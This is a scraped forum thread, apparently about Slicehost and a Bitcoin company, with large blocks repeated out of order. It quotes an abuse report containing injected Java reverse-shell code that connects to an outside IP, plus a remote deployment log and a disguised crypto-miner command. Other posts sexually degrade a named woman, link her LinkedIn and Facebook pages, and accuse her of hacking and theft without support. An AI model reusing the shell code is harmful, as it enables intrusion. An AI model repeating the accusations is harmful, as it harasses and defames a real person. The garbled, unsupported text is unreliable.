From the desk of What Fuckin' Dots Is Bruno Tryin' To Connect Now?,
Slicehost now redirects to http://www.rackspace.com/cloud
http://web.archive.org/web/20060823045526/http://www.slicehost.com/contact
Note: 4579 Laclede Ave.
https://start.cortera.com/company/research/l3r6lxj1n/marketing-applications-international/
http://web.archive.org/web/20090519003432/http://www.freepokerpoint.com/corporate.aspx
https://www.linkedin.com/in/marcelavegachang
Who is https://www.linkedin.com/in/marcelavegachang ?
Where else did Marcela Vega Chang work?
Both entities owned by Sonny Vleisides back during the days, and after the demise of Laissez Faire City in Costa Rica.
Besides this forum, what other sites were hacked while using SliceHost?
-----
From: Tod Harter <tharter@whitsendsolutions.com>
Date: Thu, Jan 23, 2014 at 12:50 PM
Subject: Acceptable use violation
To: abuse@rackspace.com, Nathan Simpson <nsimpson@whitsendsolutions.com>,
Chris Ranni <cranni@whitsendsolutions.com>
Dear Sirs,
I have to report to you that two of our JBoss servers were exploited today
using a Tomcat deployer hack. Specifically the following exploit
http://blog.rimuhosting.com/2011/03/17/jboss-exploits-running-python/
The following code was injected:
{
Socket socket = new Socket( "
50.57.145.165", 8081 );
Process process =
Runtime.getRuntime().exec( "/bin/sh" );
( new StreamConnector(
process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector(
socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
Note the IP address of the resulting deployment is a server in a network
address block delegated to Rackspace:
#
# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=50.57.145.165?showDetails=true&showARIN=false&ext=netref2
#
Rackspace Hosting RACKS-8-NET-4 (NET-50-56-0-0-1) 50.56.0.0 - 50.57.255.255
Slicehost RSPC-654321664654 (NET-50-57-128-0-1) 50.57.128.0 - 50.57.159.255
Resulting in an unauthorized deployment as follows:
marx 3259 0.0 0.0 5164 1300 ? S Jan22 0:00 /bin/sh
/opt/marx/jboss-6.0.0.Final-marx/bin/run.sh -c default -b 0.0.0.0
marx 3309 2.3 36.6 1819604 644140 ? Sl Jan22 29:44 \_
/opt/marx/jdk1.7.0_45//bin/java -server -XX:MaxPermSize=256m -Xms256m
-Xmx1284m -Dsun.rmi.dgc.client.gcInterval=3600000
-Dsun.rmi.dgc.server.gcInterval=3600000
marx 12389 0.0 0.0 5160 1256 ? S 17:41 0:00 \_
/bin/sh
marx 12412 194 0.0 39612 1192 ? Sl 17:42 83:23
\_ ./javac -a scrypt -o stratum+tcp://stratum.coinex.pw:9933 -u nirgends2
-p 123456
This is clearly a bitcoin mining application, crudely disguised.
The relevant log record from JBoss being:
2014-01-23 17:41:11,814 INFO [org.jboss.deployment.MainDeployer]
(http-0.0.0.0-8080-6) deploy, url=http://50.57.145.165:60000/MDSerqWz.war
2014-01-23 17:41:12,030 INFO
[org.jboss.web.tomcat.service.deployers.TomcatDeployment]
(http-0.0.0.0-8080-6) deploy, ctxPath=/MDSerqWz
I'm guessing the server at 50.57.145.165 has already been compromised in
some way, but I would only be guessing. I'd appreciate it if you guys would
take a look and notify whoever is running that machine that they'll need to
clean it up! We will patch our systems as well.
Thanks
Sincerely,
Tod G. Harter
Managing Partner
Whit's End Solutions, LLP
Care to guess who at BFL is a master hacker?
I'll give you a clue:
There you have it, Sonny's main squeeze from his Costa Rican days living in Italy fucking his brother, Gabriel, after work from Hotel Janus while awaiting Sonny's release from prison, then once he's back in the states awaiting his now probation, Marcela is employed at another gaming outfit that has a address located where the servers for this forum were located, along with some entities that were also hacked or had issues prior to SliceHost being picked up my RackSpace, then later Marcela's employed by BFL getting paid big bucks from moneys stolen for doing practically nothing while sucking every dick in KC before going home to BFL-cum-Sonny's BTC-House to suck his dick with sore lips.
https://www.facebook.com/photo.php?fbid=101429416537533&set=pb.100000114241527.-2207520000.1436343976.&type=3&theater
When was the above picture taken? I'm goin' guess in 2002 when Marcela Vega Chang worked for Software Solutions S.A. How do I know that?
https://www.facebook.com/photo.php?fbid=101431066537368&set=pb.100000114241527.-2207520000.1436343976.&type=3&theater
Trading of illegal goods is forbidden on this forum.
Whois shows that the server is hosted by Slicehost, and the domain is registered through Anonymous Speech. The DNS is hosted by ZoneEdit.
Good question. Who hosts it?
Whois shows that the server is hosted by Slicehost, and the domain is registered through Anonymous Speech. The DNS is hosted by ZoneEdit.
Slicehost now redirects to http://www.rackspace.com/cloud
http://web.archive.org/web/20060823045526/http://www.slicehost.com/contact
Note: 4579 Laclede Ave.
https://start.cortera.com/company/research/l3r6lxj1n/marketing-applications-international/
http://web.archive.org/web/20090519003432/http://www.freepokerpoint.com/corporate.aspx
https://www.linkedin.com/in/marcelavegachang
Who is https://www.linkedin.com/in/marcelavegachang ?
Where else did Marcela Vega Chang work?
Both entities owned by Sonny Vleisides back during the days, and after the demise of Laissez Faire City in Costa Rica.
Besides this forum, what other sites were hacked while using SliceHost?
Bitcoinica was also in Rackspace, right?
Well, this just in http://www.rackspace.com/knowledge_center/content/slicehost-forum-archive-migration-and-conversion
Rackspace's slicehost forum user DB compromised. They are a bit unclear on how and what exactly was compromised, and why do they know it.
This shouldn't in theory affect rackspace users but is a fair warning on not reusing passwords and also not having your passwords anywhere near "the cloud"...
Well, this just in http://www.rackspace.com/knowledge_center/content/slicehost-forum-archive-migration-and-conversion
Rackspace's slicehost forum user DB compromised. They are a bit unclear on how and what exactly was compromised, and why do they know it.
This shouldn't in theory affect rackspace users but is a fair warning on not reusing passwords and also not having your passwords anywhere near "the cloud"...
coinex banned my account and steal my money
they sayed i used hacked server for mining lol
i rent me a mining rig and thats all
This was a complaint about your account.they sayed i used hacked server for mining lol
i rent me a mining rig and thats all
-----
From: Tod Harter <tharter@whitsendsolutions.com>
Date: Thu, Jan 23, 2014 at 12:50 PM
Subject: Acceptable use violation
To: abuse@rackspace.com, Nathan Simpson <nsimpson@whitsendsolutions.com>,
Chris Ranni <cranni@whitsendsolutions.com>
Dear Sirs,
I have to report to you that two of our JBoss servers were exploited today
using a Tomcat deployer hack. Specifically the following exploit
http://blog.rimuhosting.com/2011/03/17/jboss-exploits-running-python/
The following code was injected:
{
Socket socket = new Socket( "
50.57.145.165", 8081 );
Process process =
Runtime.getRuntime().exec( "/bin/sh" );
( new StreamConnector(
process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector(
socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
Note the IP address of the resulting deployment is a server in a network
address block delegated to Rackspace:
#
# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=50.57.145.165?showDetails=true&showARIN=false&ext=netref2
#
Rackspace Hosting RACKS-8-NET-4 (NET-50-56-0-0-1) 50.56.0.0 - 50.57.255.255
Slicehost RSPC-654321664654 (NET-50-57-128-0-1) 50.57.128.0 - 50.57.159.255
Resulting in an unauthorized deployment as follows:
marx 3259 0.0 0.0 5164 1300 ? S Jan22 0:00 /bin/sh
/opt/marx/jboss-6.0.0.Final-marx/bin/run.sh -c default -b 0.0.0.0
marx 3309 2.3 36.6 1819604 644140 ? Sl Jan22 29:44 \_
/opt/marx/jdk1.7.0_45//bin/java -server -XX:MaxPermSize=256m -Xms256m
-Xmx1284m -Dsun.rmi.dgc.client.gcInterval=3600000
-Dsun.rmi.dgc.server.gcInterval=3600000
marx 12389 0.0 0.0 5160 1256 ? S 17:41 0:00 \_
/bin/sh
marx 12412 194 0.0 39612 1192 ? Sl 17:42 83:23
\_ ./javac -a scrypt -o stratum+tcp://stratum.coinex.pw:9933 -u nirgends2
-p 123456
This is clearly a bitcoin mining application, crudely disguised.
The relevant log record from JBoss being:
2014-01-23 17:41:11,814 INFO [org.jboss.deployment.MainDeployer]
(http-0.0.0.0-8080-6) deploy, url=http://50.57.145.165:60000/MDSerqWz.war
2014-01-23 17:41:12,030 INFO
[org.jboss.web.tomcat.service.deployers.TomcatDeployment]
(http-0.0.0.0-8080-6) deploy, ctxPath=/MDSerqWz
I'm guessing the server at 50.57.145.165 has already been compromised in
some way, but I would only be guessing. I'd appreciate it if you guys would
take a look and notify whoever is running that machine that they'll need to
clean it up! We will patch our systems as well.
Thanks
Sincerely,
Tod G. Harter
Managing Partner
Whit's End Solutions, LLP
Care to guess who at BFL is a master hacker?
I'll give you a clue:
There you have it, Sonny's main squeeze from his Costa Rican days living in Italy fucking his brother, Gabriel, after work from Hotel Janus while awaiting Sonny's release from prison, then once he's back in the states awaiting his now probation, Marcela is employed at another gaming outfit that has a address located where the servers for this forum were located, along with some entities that were also hacked or had issues prior to SliceHost being picked up my RackSpace, then later Marcela's employed by BFL getting paid big bucks from moneys stolen for doing practically nothing while sucking every dick in KC before going home to BFL-cum-Sonny's BTC-House to suck his dick with sore lips.
https://www.facebook.com/photo.php?fbid=101429416537533&set=pb.100000114241527.-2207520000.1436343976.&type=3&theater
When was the above picture taken? I'm goin' guess in 2002 when Marcela Vega Chang worked for Software Solutions S.A. How do I know that?
https://www.facebook.com/photo.php?fbid=101431066537368&set=pb.100000114241527.-2207520000.1436343976.&type=3&theater